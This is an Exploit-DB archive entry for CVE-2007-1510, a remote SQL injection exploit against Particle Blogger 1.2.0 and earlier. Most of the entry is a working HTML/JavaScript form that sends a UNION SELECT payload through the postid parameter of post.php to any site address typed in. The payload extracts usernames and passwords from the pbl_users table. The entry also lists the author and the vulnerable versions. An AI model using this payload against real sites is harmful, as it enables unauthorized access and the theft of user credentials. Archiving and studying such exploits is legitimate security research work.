Particle Blogger <= 1.2.0 post.php postid Remote SQL Injection Exploit

2007-03-16T00:00:00
ID EDB-ID:3500
Type exploitdb
Reporter WiLdBoY
Modified 2007-03-16T00:00:00

Description

Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit. CVE-2007-1510. Webapps exploit for php platform

                                        
                                            &lt;!--

Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-16}

Product / Vendor :

Particle Soft

http://blogger.particlesoft.net/

Bug :

http://localhost/script/post.php?postid=-SQL Inj-

Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit :

--&gt;

&lt;title&gt;Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit&lt;/title&gt;
&lt;body bgcolor="#000000"&gt;
&lt;script language="JavaScript"&gt;
function ps() {
  {
    unique.action=""+document.unique.site.value+"/post.php?postid=-1/**/UNION/**/SELECT/**/null,username,password,null,null,null,null/**/FROM/**/pbl_users/*";
    unique.submit();
  }
}
&lt;/script&gt;
&lt;center&gt;&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;
&lt;form name="unique" method="POST" onsubmit="ps();"&gt;
&lt;center&gt;&lt;font face="Arial" size="2" color="#00FF00"&gt;Site Address :&lt;/td&gt;&lt;/center&gt;&lt;br&gt;
&lt;center&gt;&lt;input type="text" name="site" value="http://localhost/script" size="44" class="unique" class="inputbox"&gt;&lt;/center&gt;&lt;br&gt;
&lt;center&gt;&lt;input type="submit" value="Apply" class="unique"&gt;&lt;/center&gt;&lt;br&gt;
&lt;center&gt;&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;UniquE-Key{UniquE-Cracker}&lt;/b&gt;&lt;/font&gt;
&lt;br&gt;
&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;UniquE@UniquE-Key.ORG&lt;/b&gt;&lt;/font&gt;
&lt;br&gt;
&lt;font face="Verdana" size="2" color="#FF0000"&gt;&lt;b&gt;http://UniquE-Key.ORG&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;

&lt;!--

Tested :

Particle Blogger 1.1.2

Vulnerable :

Particle Blogger 1.2.0

Particle Blogger 1.1.2

Particle Blogger 1.1.1

Particle Blogger 1.1.0

Particle Blogger 1.0.0

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

--&gt;

# milw0rm.com [2007-03-16]